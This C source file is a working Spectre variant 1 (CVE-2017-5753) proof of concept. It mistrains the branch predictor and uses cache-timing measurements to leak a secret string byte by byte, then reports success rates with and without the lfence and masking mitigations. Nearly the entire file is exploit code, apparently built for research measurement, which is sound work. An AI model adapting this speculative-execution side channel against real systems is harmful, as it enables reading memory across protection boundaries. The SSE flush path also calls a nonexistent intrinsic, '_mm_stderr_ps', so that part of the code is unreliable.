/* spectre.c - CVE-2017-5753 user-to-user sucess rate measurement
 *
 * Borrows code from 
 *  - https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6
 *  - https://github.com/genua/meltdown
 *
 * Copyright (c) 2022 Samuel AUBERTIN
 *
 * Permission to use, copy, modify, and distribute this software for any
 * purpose with or without fee is hereby granted, provided that the above
 * copyright notice and this permission notice appear in all copies.
 *
 * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
 * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
 * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
 * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
 * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h> /* for rdtscp and clflush */

#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE	64
#else
#error "unsupported architecture"
#endif

#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif 

#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2

#ifndef NORDTSCP
#define LATENCY 42 + 42
#else
#ifndef NOMFENCE
#define LATENCY 18 + 18
#endif
#endif

#ifdef MASKING_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 
 *
 * array_index_mask_nospec() - generate a mask that is ~0UL when the
 * 	bounds check succeeds and 0 otherwise
 * @index: array element index
 * @size: number of elements in array
 *
 * Returns:
 *     0 - (index < size)
 */
static inline unsigned long
array_index_mask_nospec(
                unsigned long index,
		unsigned long size
                )
{
        unsigned long mask;
	__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
			:"=r" (mask)
			:"g"(size),"r" (index)
			:"cc");
	return mask;
}
#endif //MASKING_MITIGATION

#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096

uint8_t 	cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];

/* Flush memory using long SSE instructions */
void 
flush_memory_sse(
                uint8_t * addr
                )
{
        float * p = (float *)addr;
        float c = 0.f;
        __m128 i = _mm_setr_ps(c, c, c, c);

        int k, l;
        /* Non-sequential memory addressing by looping through k by l */
        for (k = 0; k < 4; k++)
                for (l = 0; l < 4; l++)
                        _mm_stderr_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH

char* 		secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";


unsigned int 	array1_size = 16;
uint8_t 	unused1[64];
uint8_t 	array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t 	unused2[64];
uint8_t 	array2[256 * 512];
uint8_t 	temp = 0; /* Used so compiler won’t optimize out victim_function() */
unsigned	cache_hit_threshold;


static inline unsigned
timed_access(
                volatile uint8_t *addr
                )
{
	uint64_t	t0, t1;
        #pragma GCC diagnostic ignored "-Wuninitialized"
	unsigned int junk = junk;
	#ifndef NORDTSCP
        t0 = __rdtscp(& junk);
        junk |= *addr;
        t1 = __rdtscp(& junk);
	#else
	#ifndef NOMFENCE
        /*
        Since the rdstc instruction isn't serialized, newer processors will try to
        reorder it, ruining its value as a timing mechanism.
        To get around this, we use the mfence instruction to introduce a memory
        barrier and force serialization. mfence is used because it is portable across
        Intel and AMD.
        */
        _mm_mfence();
        t0 = __rdtsc(); 
        _mm_mfence();
        junk = * addr; 
        _mm_mfence();
        t1 = __rdtsc();
        _mm_mfence();

	#else
        /*
        The mfence instruction was introduced with the SSE2 instruction set, so
        we have to ifdef it out on pre-SSE2 processors.
        Luckily, these older processors don't seem to reorder the rdtsc instruction,
        so not having mfence on older processors is less of an issue.
        */
        t0 = __rdtsc();
        junk |= *addr;
        t1 = __rdtsc();
	#endif // NOMFENCE
	#endif // NORDTSCP 
	return (unsigned)(t1 - t0 - LATENCY);
}

static void
calibrate_threshold(
                unsigned int    *threshold
                )
{
	volatile char 		buf[2 * CACHELINE_SIZE];
	volatile uint8_t 	*bufp;
	int 			i;
	const int 		cnt = 10000;
	uint64_t 		tcache = 0;
	__attribute__((unused))
	volatile int 		junk = 0;

	bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
	    ~(CACHELINE_SIZE - 1)));

	junk |= *bufp;
	
	for (i = 0, tcache = 0; i < cnt; i++) {
		tcache += timed_access(bufp);
	}
	tcache = tcache / cnt;
	
	if (threshold != NULL) {
		*threshold = tcache + LATENCY;
	}
	return;
}

void
victim_function(
                size_t  x
                )
{
        if (x < array1_size) {
		#ifdef LFENCE_MITIGATION
		/*
		 * According to Intel et al, the best way to mitigate this is to 
		 * add a serializing instruction after the boundary check to force
		 * the retirement of previous instructions before proceeding to 
		 * the read.
		 * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
		 */
                _mm_lfence();
		#endif
		#ifdef MASKING_MITIGATION
                x &= array_index_mask_nospec(x, array1_size);
		#endif
                temp &= array2[array1[x] * 512];
        }
}

void
leak(
	        size_t		malicious_x,
	        uint8_t		value[2],
	        int		score[2],
	        unsigned	cache_hit_threshold
	)
{
	static int		results[256];
	int 			tries, i, j, mix_i;
	unsigned int 		junk = 0;
	size_t 			training_x, x;
	volatile uint8_t 	*addr;

	#ifdef NOCLFLUSH
        int junk2 = 0;
        int l;
        (void)junk2;
	#endif

	for (i = 0; i < 256; i++) {
		results[i] = 0;
        }

	for (tries = 999; tries > 0; tries--) {

		#ifndef NOCLFLUSH
	        /* Flush array2[256*(0..255)] from cache */
	        for (i = 0; i < 256; i++)
	                _mm_clflush(&array2[i * 512]);
		#else 
                /* Flush array2[256*(0..255)] from cache
                using long SSE instruction several times */
                for (j = 0; j < 16; j++) {
                        for (i = 0; i < 256; i++) {
                                flush_memory_sse( & array2[i * 512]);
                        }
                }
		#endif

        	/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        	training_x = tries % array1_size;
        	for (j = 29; j >= 0; j--) {
			#ifndef NOCLFLUSH
        		_mm_clflush(&array1_size);
			#else
                        /* Alternative to using clflush to flush the CPU cache 
                         * Read addresses at 4096-byte intervals out of a large array.
                         * Do this around 2000 times, or more depending on CPU cache size. */
                        for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) {
                                junk2 = cache_flush_array[l];
                        }
			#endif
        		for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
        		/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
        		/* Avoid jumps in case those tip off the branch predictor */
        		x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
        		x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
        		x = training_x ^ (x & (malicious_x ^ training_x));
        		/* Call the victim! */
        		victim_function(x);
        
        	}
        
        	/* Time reads. Order is lightly mixed up to prevent stride prediction */
        	for (i = 0; i < 256; i++) {
        		mix_i = ((i * 167) + 13) & 255;
        		addr = & array2[mix_i * 512];
                        if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
        		        results[mix_i]++; /* cache hit - add +1 to score for this value */
        	}
        
        	/* Locate highest results in j */
        	j = -1;
        	for (i = 0; i < 256; i++) {
        		if (j < 0 || results[i] >= results[j]) {
        			j = i;
        		}
        	}
        	if (results[j] >= 3)
        		break;
	}

	results[0] ^= junk; /* use junk so code above won’t get optimized out*/
	value[0] = (uint8_t) j;
	score[0] = results[j];
}

int 
main(
                int     argc,
                char**  argv
        ) 
{
	int		o;
	size_t 		malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
	int 		i, score[2], len = (int)strlen(secret);
  	uint8_t 	value[2];
  	unsigned 	successes = 0;
  	int		json = 0;
  	
	while ((o = getopt(argc, argv, "t:j")) != EOF) {
		switch (o) {
			case 't':
				cache_hit_threshold = atoi(optarg);
				break;
                        case 'j':
				json++;
                                break;
			default:
			usage:
				fprintf(stderr, "usage: %s [-j] "
			    "[-t threshold]\n"
			    "\t-j\t\tJSON output\n"
                            "\t-t INT\t\tfixed threshold\n", argv[0]);
				return 1;
		}
	}
	if (argc != optind)
		goto usage;
	
	fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ",
		argv[0] + 2,
		(int)strlen(secret));
	
	calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
	
	#ifdef NOCLFLUSH
        for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
                cache_flush_array[i] = 1;
        }
	#endif

	for (i = 0; i < (int)sizeof(array2); i++)
		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */

	while (--len >= 0) {
		leak(malicious_x++, value, score, cache_hit_threshold);
		if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
			successes++;
			fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
		} else {
			fprintf(stderr, "\033[31m?\033[0m");
		}	
	}
	fprintf(stderr, "\n");
	if (json) {
		printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
		#ifndef NORDTSCP
        	printf("\"rdtscp\": true, ");
        	#else
        	printf("\"rdtscp\": false, ");
        	#endif
       		#ifndef NOMFENCE
        	printf("\"mfence\": true, ");
        	#else
        	printf("\"mfence\": false, ");
        	#endif
        	#ifndef NOCLFLUSH
        	printf("\"clflush\": true ");
        	#else
        	printf("\"clflush\": false ");
        	#endif
        	printf("}, \"mitigations\": { ");
        	#ifdef LFENCE_MITIGATION
        	printf("\"lfence\": true, ");
        	#else
        	printf("\"lfence\": false, ");
        	#endif
        	#ifdef MASKING_MITIGATION
        	printf("\"masking\": true ");
        	#else
        	printf("\"masking\": false ");
        	#endif
        	printf("}, ");
		printf("\"threshold\": %d, ", cache_hit_threshold);
		printf("\"success\": %.0f } }",
			100 * successes / (float)strlen(secret));	
	}
	fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
	#ifndef NORDTSCP
        fprintf(stderr, "RDTSCP ");
        #else
        fprintf(stderr, "RDTSC ");
        #endif
       	#ifndef NOMFENCE
        fprintf(stderr, "MFENCE ");
        #endif
        #ifndef NOCLFLUSH
        fprintf(stderr, "CLFLUSH ");
        #endif
        #ifdef LFENCE_MITIGATION
        fprintf(stderr, "LFENCE_MITIGATION ");
        #endif
        #ifdef MASKING_MITIGATION
        fprintf(stderr, "MASKING_MITIGATION ");
        #endif
	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", 
		cache_hit_threshold,
		100 * successes / (float)strlen(secret));

	return 0;
}